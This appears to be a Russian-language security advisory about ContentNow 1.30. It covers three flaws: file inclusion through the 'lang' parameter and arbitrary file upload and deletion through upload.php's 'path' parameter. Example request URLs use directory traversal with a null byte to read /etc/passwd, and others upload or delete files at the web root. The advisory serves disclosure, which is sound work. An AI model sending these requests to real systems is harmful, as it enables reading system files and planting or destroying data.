Программа: ContentNow 1.30

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

1) Уязвимость существует из-за недостаточной обработки входных данных в параметре "lang" в сценарии includes/logger_engine.php. Удаленный пользователь может получить конфиденциальную информацию на целевой системе.

Пример:

http://localhost/cn/edit.php?lang=../../../../etc/passwd%00
http://localhost/cn/image.php?lang=../../../../etc/passwd%00
http://localhost/cn/upload.php?lang=../../../../etc/passwd%00

2) Уязвимость существует из-за недостаточной обработки входных данных в параметре "path" в сценарии upload.php. Удаленный пользователь может подгружать произвольные файлы.

Пример:

http://localhost/cn/upload.php?path=/&cid=&type=file&single=false&folder=&lang=en
set path to equal dir location:
/ = root path

Select file, then upload it.

3) Уязвимость существует из-за недостаточной обработки входных данных в параметре "path" в сценарии upload.php. Удаленный пользователь может удалять произвольные файлы.

Пример:

http://localhost/contentnow_130/cn/upload.php?path=/&cid=&type=file&folder=&lang=en&delfile=q.php&single=false
set path to equal dir location:
/ = root path
set delfile for file you want to delete:
q.php

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии